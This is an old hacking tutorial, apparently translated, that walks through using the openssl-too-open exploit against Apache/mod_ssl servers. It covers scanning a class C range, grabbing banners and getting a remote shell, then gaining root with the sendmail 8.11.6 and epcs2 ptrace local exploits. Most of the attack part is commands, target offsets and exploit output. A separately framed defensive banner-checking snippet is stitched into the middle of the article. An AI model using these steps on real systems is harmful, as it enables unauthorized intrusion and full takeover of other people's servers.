Exploiting the Apache/OpenSSL vulnerability and escalating privileges

Original post, 2004-09-07 23:55:00


--nightcat
Please keep this article intact when reposting.

Part 1: Getting a shell

While spending some time on packetstorm I came across the exploit openssl-too-open.tar.gz.
Let's look at the package description:
OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability analysis

This description says the exploit uses the KEY_ARG vulnerability in OpenSSL 0.9.6 to achieve the overflow. Note, however, that the Apache/mod_ssl version also matters. On most systems that meet these conditions the overflow succeeds and yields a shell with uid nobody, and on some even root privileges. The package contains a scanner and the exploit.


That sounds very tempting, so I downloaded it to take a look.
nightcat@nightcat$ tar -zxvf openssl-too-open.tar.gz
nightcat@nightcat$ cd openssl-too-open
Makefile  README  linux-x86.c  main.c  main.h  scanner.c  ssl2.c  ssl2.h

Out of habit, I read the package's README first.
nightcat@nightcat$ more README
It gives some useful information:
1. How to compile:
Just run make; this produces openssl-too-open and openssl-scanner.

2. Usage of openssl-too-open:
Usage: ./openssl-too-open [options]
  -a <arch>     target architecture (default is 0x00)
  -p <port>     SSL port (default is 443)
  -c <N>        open N apache connections before sending the shellcode (default is 30)
  -m <N>        maximum number of open connections (default is 50)
  -v            verbose mode

Supported architectures:
        0x00 - Gentoo (apache-1.3.24-r2)
        0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
        0x02 - Slackware 7.0 (apache-1.3.26)
        0x03 - Slackware 8.1-stable (apache-1.3.26)
        0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
        0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
        0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
        0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
        0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
        0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
        0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
        0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
        0x0c - SuSE Linux 7.0 (apache-1.3.12)
        0x0d - SuSE Linux 7.1 (apache-1.3.17)
        0x0e - SuSE Linux 7.2 (apache-1.3.19)
        0x0f - SuSE Linux 7.3 (apache-1.3.20)
        0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
        0x11 - SuSE Linux 8.0 (apache-1.3.23)
        0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
        0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
        0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
        0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)

/**** To succeed you must correctly identify the OS type and the Apache version.
***** If it is 0x07 - RedHat Linux 7.0 (apache-1.3.12-25):
***** ./openssl-too-open -a 0x07 ip  should do it!
****/

3. Usage of openssl-scanner:
Usage: ./openssl-scanner [options]
  -i <file>     file with target hosts
  -o <file>     output log
  -a            append to output log (requires -o)
  -b            check for big endian servers
  -C            scan the entire class C network the host belogs to
  -d            debug mode
  -w N          connection timeout in seconds

Examples: ./openssl-scanner -d 192.168.0.1
          ./openssl-scanner -i hosts -o my.log -w 5
          ./openssl-scanner -C 192.168.0.0

/**** Scan a class C range:
***** ./openssl-scanner -C 192.168.0.0
****/


4. A worked example:

$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
  by Solar Eclipse <solareclipse@phreedom.org>

Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done

192.168.0.136: Vulnerable


$ nc 192.168.0.1 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html


./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
  by Solar Eclipse <solareclipse@phreedom.org>

: Opening 30 connections
  Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
  ssl0 : 0x810b3a0
  ssl1 : 0x810b360
  ssl2 : 0x810b4e0

* Addresses don't match.

: Opening 40 connections
  Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
  ssl0 : 0x8103830
  ssl1 : 0x80fd668
  ssl2 : 0x80fd668

* Addresses don't match.

: Opening 50 connections
  Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
  ssl0 : 0x8103830
  ssl1 : 0x8103830
  ssl2 : 0x8103830

: Sending shellcode
ciphers: 0x8103830   start_addr: 0x8103770   SHELLCODE_OFS: 184
  Reading tag
  Execution of stage1 shellcode succeeded, sending stage2
  Spawning shell...

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
  1:49pm  up  4:26,  1 user,  load average: 0.04, 0.07, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
bash-2.05$


The README already explains everything clearly.
To summarise the procedure:
1. Scan a class C range with openssl-scanner to find vulnerable hosts.
2. Grab the banner with nc to obtain the three pieces of target information: the Apache version, the OpenSSL version and the operating system version.
3. Run openssl-too-open to trigger the overflow and obtain a shell.
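The banner collected in step 2 is also what a defender checks when inventorying their own servers. The following is an added example, not code from the article or from the openssl-too-open package: it parses the Server: value returned by the HEAD request and flags a build as in the affected range when it advertises mod_ssl with OpenSSL 0.9.6d or below, the cut-off given in the package description. The function names and the version-ordering rule (a release with no letter sorts before the same release with one) are my own.

```c
#include <stdio.h>
#include <string.h>

/* Parsed OpenSSL version, e.g. 0.9.6b -> {0, 9, 6, 'b'}; letter is 0 when absent. */
struct ossl_ver { int major, minor, patch; char letter; };

/* Pull "OpenSSL/x.y.z[l]" out of a Server: header value; returns 0 if absent. */
static int parse_openssl_version(const char *server_hdr, struct ossl_ver *v)
{
    const char *p = strstr(server_hdr, "OpenSSL/");
    char letter = 0;
    if (!p) return 0;
    p += strlen("OpenSSL/");
    int n = sscanf(p, "%d.%d.%d%c", &v->major, &v->minor, &v->patch, &letter);
    if (n < 3) return 0;
    /* a trailing lowercase letter is the patch level; anything else means none */
    v->letter = (n == 4 && letter >= 'a' && letter <= 'z') ? letter : 0;
    return 1;
}

/* Order two versions: negative if a < b, 0 if equal, positive if a > b.
 * A release with no letter sorts before the same release with one. */
static int ossl_cmp(const struct ossl_ver *a, const struct ossl_ver *b)
{
    if (a->major != b->major) return a->major - b->major;
    if (a->minor != b->minor) return a->minor - b->minor;
    if (a->patch != b->patch) return a->patch - b->patch;
    return (int)a->letter - (int)b->letter;
}

/* 1 if the banner advertises mod_ssl with OpenSSL 0.9.6d or below (the range the
 * package description gives), 0 if not or if the banner does not say. */
int banner_affected(const char *server_hdr)
{
    struct ossl_ver v, last_bad = { 0, 9, 6, 'd' };   /* cut-off from the description */
    if (!strstr(server_hdr, "mod_ssl/")) return 0;
    if (!parse_openssl_version(server_hdr, &v)) return 0;
    return ossl_cmp(&v, &last_bad) <= 0;
}

int main(void)
{
    /* Server: value from the HEAD response shown earlier in the article */
    const char *banner = "Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) "
                         "mod_ssl/2.8.4 OpenSSL/0.9.6b";
    printf("%s\n -> %s\n", banner,
           banner_affected(banner) ? "in affected range" : "not flagged");
    return 0;
}
```

The banner is only a hint: distribution packages often backport fixes without changing the advertised version, so treat a hit as a prompt to check the installed package's changelog rather than as proof.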

For step 2, I wrote a program that fetches the banner conveniently.
/* the www banner scanner, 80scanner version 1.0
 *
 * connect to the given ip or domain and print the web server banner
 *
 * to compile:
 * user$ gcc -o 80scanner 80scanner.c
 *
 * to use:
 * user$ ./80scanner somedomain.com (i.e. ./80scanner antionline.com)
 *
 * coded by nightcat
 * march 2004
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    int s;
    ssize_t n;
    struct sockaddr_in victim;
    struct hostent *host;
    char buffer[1024];
    const char *request = "HEAD / HTTP/1.0\r\n\r\n";

    if (argc != 2) {
        fprintf(stderr, "\nUsage: %s domain.com\n", argv[0]);
        exit(1);
    }

    /* resolve the host name (or dotted IP) given on the command line */
    if ((host = gethostbyname(argv[1])) == NULL) {
        fprintf(stderr, "Error resolving hostname\n");
        exit(1);
    }

    printf("check web server version\n");
    printf("coded by nightcat\n");
    sleep(2);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) { perror("socket"); exit(1); }

    memset(&victim, 0, sizeof(victim));
    memcpy(&victim.sin_addr, host->h_addr_list[0], host->h_length);
    victim.sin_family = AF_INET;
    victim.sin_port = htons(80);

    if (connect(s, (struct sockaddr *)&victim, sizeof(victim)) < 0) {
        perror("connect");
        exit(1);
    }

    printf("\ngetting http version\n\n");
    /* a HEAD request returns only the headers, which is where the
     * Server: banner (Apache, mod_ssl and OpenSSL versions) lives */
    send(s, request, strlen(request), 0);

    /* leave room for the terminating NUL; recv() does not add one */
    n = recv(s, buffer, sizeof(buffer) - 1, 0);
    if (n < 0) { perror("recv"); exit(1); }
    buffer[n] = '\0';
    printf("version:\n%s", buffer);
    close(s);
    return 0;
}
Compile it on Linux as usual.
nightcat@nightcat$ ./80scanner www.host.com (172.19.168.1)

Part 2: Escalating privileges

Our goal is not merely to get a shell but to get root. By this point we already know the host's OS type, so we only need a local root exploit for that system to get root. There are far too many of these; for Red Hat systems I will introduce two.
The first is a local root exploit for sendmail:
1. Vulnerability description:
/*
 * local exploit for sendmail 8.11.6
 * by sorbo (sorbox@yahoo.com)
 * http://www.darkircop.org
 *
 * This exploit takes advantage of the vulnerable prescan() function that
 * allows the user to input 0xff in order to skip the length check of the buffer.
 *
 * The vulnerability was found by Michal Zalewski
 *
 * The goal is to overwrite the 2 lsb of the saved frame pointer and make it
 * point to an area we control.
 *
 * We can overflow pvpbuf[] in parseaddr() (which calls prescan()) and overwrite
 * parseaddr's saved frame pointer.
 * When parseaddr() returns, the control is back to sendtolist() but the frame pointer
 * will be modified (we make it point to somewhere in pvpbuf).
 * We can't just fill pvpbuf with the ret value we want, since sendtolist() doesn't
 * exit right away, but instead makes use of some variables.
 * We need therefore to construct pvpbuf in an intelligent way, so references to variables
 * will be valid.
 * The first variable to set is delimptr (located at ebp - something).
 * We simply make this point to a 0, so the for loop exits.
 * The next variable to set is al (located at ebp - something). We need to make a->q_next
 * point to 0 so the while loop exits. a->q_next is a+11*4.
 * The next variable is e (ebp + something). We make it point to a 0
 * The next variable is bufp (ebp - something). This needs to be equal to buf to skip the free.
 * This cannot be done since the address contains a 0xff and this cannot be input in pvpbuf.
 * We just make it point to a valid chunk (in our case... our fake chunk). We can't make it point
 * to stack since arena_for_ptr() will fail. Luckily our arguments get copied on the heap, so we
 * just point it to that.
 * Next we just set the ret (ebp + 4) to our shellcode and when sendtolist() exits our
 * shellcode will be executed. Note shellcode is even copied on heap, so non executable stacks will not
 * stop the exploit (the ret addr must match the shellcode location on the heap though)
 *
 * Note that if we overflow ebp by only one byte (putting a 0) i.e. the classical way
 * will not work since the register will not point to pvpbuf. What we do is overwrite two
 * bytes with 0x005c. Then we fill up the stack (by passing a long argument) so we lower the
 * address of pvpbuf until it is in the range of the ebp. Also our shellcode will be at a low
 * stack address < 0xbffefefe (since we cannot write 0xff in pvpbuf).
 *
 * NOTE: sendmail 8.12.8 cannot be exploited this way since there is an assert() which cannot
 * be bypassed (in sendtolist()).
 *
 * have fun
 *
 * Greetz: Knight420, Stefano Biondi, nevez
 */
It simply exploits the length-check problem in the prescan() function.

2. Detailed usage:
Local sendmail 8.11.6 exploit by sorbo (sorbox@yahoo.com)
Usage: ./sendmail
-h      this lame message
-t      target
-b      brute force

Id      Description     pvpbuf          zero            chunk           shellcode addr
0)      Slackware 8.0   0xbffdfef4      0xbffe15d6      0x80f30a0       0xbffe1f36
1)      Redhat 7.3      0xbffdfcd0      0xbffe19a6      0x80f30a0       0xbffe1f36
2)      Redhat 7.2      0xbffdfcd0      0xbffe19a6      0x80f30a0       0xbffe1f36

If it is Red Hat 7.2, simply run:
./sendmail -b -t 2  and you get root.


The other is epcs2.c:

/*
 * epcs2 (improved by lst [liquid@dqc.org])
 * ~~~~~~~
 * exploit for execve/ptrace race condition in Linux kernel up to 2.2.18
 *
 * originally by:
 * (c) 2001 Wojciech Purczynski / cliph / <wp@elzabsoft.pl>
 *
 * improved by:
 * lst [liquid@dqc.org]
 *
 * This sploit does _not_ use brute force. It does not need that.
 * It does only one attempt to sploit the race condition in execve.
 * Parent process waits for a context-switch that occur after
 * child task sleep in execve.
 *
 * It should work even on openwall-patched kernels (I haven't tested it).
 *
 * Compile it:
 *      cc epcs.c -o epcs
 * Usage:
 *      ./epcs [victim]
 *
 * It gives instant root shell with any of a suid binaries.
 *
 * If it does not work, try use some methods to ensure that execve
 * would sleep while loading binary file into memory,
 *
 *      i.e.: cat /usr/lib/* >/dev/null 2>&1
 *
 * Tested on RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4
 * This exploit does not work on 2.4.x because kernel won't set suid
 * privileges if user ptraces a binary.
 * But it is still exploitable on these kernels.
 *
 * Thanks to Bulba (he made me to take a look at this bug ;) )
 * Greetings to SigSegv team.
 *
 * -- d00t
 * improved by lst [liquid@dqc.org]
 * props to kevin for most of the work
 *
 * now works on stack non-exec systems with some neat trickery for the automated
 * method, ie. no need to find the bss segment via objdump
 *
 * particularly it now rewrites the code instruction sets in the
 * dynamic linker _start segment and continues execution from there.
 *
 * an aside, due to the fact that the code self-modified, it wouldn't work
 * quite correctly on a stack non-exec system without playing directly with
 * the bss segment (ie no regs.eip = regs.esp change).  this is much more
 * automated.  however, do note that the previous version did not trigger stack
 * non-exec warnings due to how it was operating.  note that the regs.eip = regs.esp
 * method will break on stack non-exec systems.
 *
 * as always.. enjoy.
 *
 */
It simply exploits the execve/ptrace race condition.
2. Usage:
 * Usage:
 *      ./epcs [victim]

This one can be run directly:
./epcs  and you get root. If "enjoy" appears, it means it worked.


Part 3: Summary

/***** Learn as much as you can about everything you can *****/
What I want to say is this:
Understand what the tools you use actually do, and understand why they can be used this way; that is our real purpose.
Intrusion is only one way of understanding the underlying principles. Do not use what I have introduced here to cause damage; that is not why I wrote this article.

Contact me:
qq:1043931
e-mail:ncnynl@hotmail.com

